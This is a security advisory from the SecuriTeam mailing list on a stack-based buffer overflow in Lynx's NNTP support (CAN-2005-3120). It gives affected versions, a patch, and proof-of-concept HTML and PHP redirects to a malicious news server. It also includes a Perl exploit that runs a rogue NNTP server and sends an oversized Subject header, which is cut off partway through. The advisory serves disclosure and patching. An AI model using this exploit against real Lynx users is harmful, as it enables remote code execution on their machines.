[UNIX] Lynx NNTP Buffer Overflow

The following security advisory is sent to the securiteam mailing list, and can 
be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion

The SecuriTeam alerts list - Free, Accurate, Independent.

Get your security news from a reliable source.
http://www.securiteam.com/mailinglist.html 

- - - - - - - - -



  Lynx NNTP Buffer Overflow
------------------------------------------------------------------------


SUMMARY

" <http://lynx.isc.org/> Lynx is a fully-featured World Wide Web (WWW) 
client for users running cursor-addressable, character-cell display 
devices (e.g. vt100 terminals, vt100 emulators running on PCs or Macs, or 
any other character-cell display)."

Lynx does not verify the length of buffer it copies allowing remote 
attackers to execute arbitrary code using buffer overflow in Lynx's NNTP 
support.

DETAILS

Vulnerable Systems:
 * Lynx version 2.8.5
 * Lynx version 2.8.6dev.13
 * Lynx version 2.8.4
 * Lynx version 2.8.3
 * Lynx version 2.8.2

When Lynx connects to an NNTP server to fetch information about the 
available articles in a newsgroup, it will call a function called HTrjis() 
with the information from certain article headers. The function adds 
missing ESC characters to certain data, to support Asian character sets. 
However, it does not check if it writes outside of the char array buf, and 
that causes a stack-based buffer overflow, with full control over EIP, 
EBX, EBP, ESI and EDI.

Two attack vectors to make a victim visit a URL to a dangerous news server 
are: (a) *links in web pages*, where the victim visits some web page and 
selects a link on the page to a malicious URL, and (b) *redirecting 
scripts*, where the victim visits a URL and it redirects automatically to 
a malicious URL. Attack vector (a) is helped by the fact that Lynx does 
not automatically display where links lead to, unlike many graphical web 
browsers.

Victims are in danger when their Lynx session is forced to visit a URL of 
the types "nntp://some.news.server/group.name"; or "news:group.name";, and 
the server that Lynx connects to must send back article headers with 
certain malicious data. It may be possible to make real news servers 
distribute such articles without technical problems, but that has not been 
tested.

Proof of Concept 1:
< html>
< head>
< title>lynx test< /title>
< /head>

< body>
< a href="nntp://malicious.news.server/alt.angst";>Click me!< /a>
< /body>
< /html>

Proof of Concept 2:
< ? php

header('Location: nntp://malicious.news.server/alt.angst');

? >

Possible Patch:
--- WWW/Library/Implementation/HTMIME.c.old     2004-01-08 03:03:09.000000000 
+0100
+++ WWW/Library/Implementation/HTMIME.c 2005-09-25 17:25:02.499592560 
+0200
@@ -2230,7 +2230,7 @@ PUBLIC int HTrjis ARGS2(
strcpy(t, s);
return 1;
}
-    for (p = buf; *s; ) {
+    for (p = buf; *s && p < buf + LINE_LENGTH - 8; ) {
if (!kanji && s[0] == '$' && (s[1] == '@' || s[1] == 'B')) {
if (HTmaybekanji((int)s[2], (int)s[3])) {
kanji = 1;
@@ -2253,7 +2253,7 @@ PUBLIC int HTrjis ARGS2(
}
*p++ = *s++;
}
-    *p = *s;   /* terminate string */
+    *p = '\0'; /* terminate string */

strcpy(t, buf);
return 0;

CVE Information:
 <http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2005-3120> 
CAN-2005-3120

Exploit:
#!/usr/bin/perl --

# lynx-nntp-server
# by Ulf Harnhammar in 2005
# I hereby place this program in the public domain.

use strict;
use IO::Socket;

$main::port = 119;
$main::timeout = 5;

# *** SUBROUTINES ***

sub mysend($$)
{
  my $file = shift;
  my $str = shift;

  print $file "$str\n";
  print "SENT:  $str\n";
} # sub mysend

sub myreceive($)
{
  my $file = shift;
  my $inp;

  eval
  {
    local $SIG{ALRM} = sub { die "alarm\n" };
    alarm $main::timeout;
    $inp = <$file>;
    alarm 0;
  };

  if ($@ eq "alarm\n") { $inp = ''; print "TIMED OUT\n"; }
  $inp =~ tr/\015\012\000//d;
  print "RECEIVED:  $inp\n";
  $inp;
} # sub myreceive

# *** MAIN PROGRAM ***

{
  my $server = IO::Socket::INET->new( Proto     => 'tcp',
                                      LocalPort => $main::port,
                                      Listen    => SOMAXCONN,
                                      Reuse     => 1);
  die "can't set up server!\n" unless $server;

  while (my $client = $server->accept())
  {
    $client->autoflush(1);
    print 'connection from '.$client->peerhost."\n";

    mysend($client, '200 Internet News');
    my $group = 'alt.angst';

    while (my $str = myreceive($client))
    {
      if ($str =~ m/^mode reader$/i)
      {
        mysend($client, '200 Internet News');
        next;
      }

      if ($str =~ m/^group ([-_.a-zA-Z0-9]+)$/i)
      {
        $group = $1;
        mysend($client, "211 1 1 1 $group");
        next;
      }

      if ($str =~ m/^quit$/i)
      {
        mysend($client, '205 Goodbye');
        last;
      }

      if ($str =~ m/^head ([0-9]+)$/i)
      {
        my $evil = '$@UU(JUU' x 21; # Edit the number!
        $evil .= 'U' x (504 - length $evil);

        my $head = <<HERE;
221 $1 <xyzzy\@usenet.qx>
Path: host!someotherhost!onemorehost
From: <mr_talkative\@usenet.qx>
Subject: $evil
Newsgroup: $group
Message-ID: <xyzzy\@usenet.qx>


======================================== 


This bulletin is sent to members of the SecuriTeam mailing list. 
To unsubscribe from the list, send mail with an empty subject line and body to: 
list-unsubscribe@securiteam.com 
In order to subscribe to the mailing list, simply forward this email to: 
list-subscribe@securiteam.com 


==================== 
==================== 

DISCLAIMER: 
The information in this bulletin is provided "AS IS" without warranty of any 
kind. 
In no event shall we be liable for any damages whatsoever including direct, 
indirect, incidental, consequential, loss of business profits or special 
damages.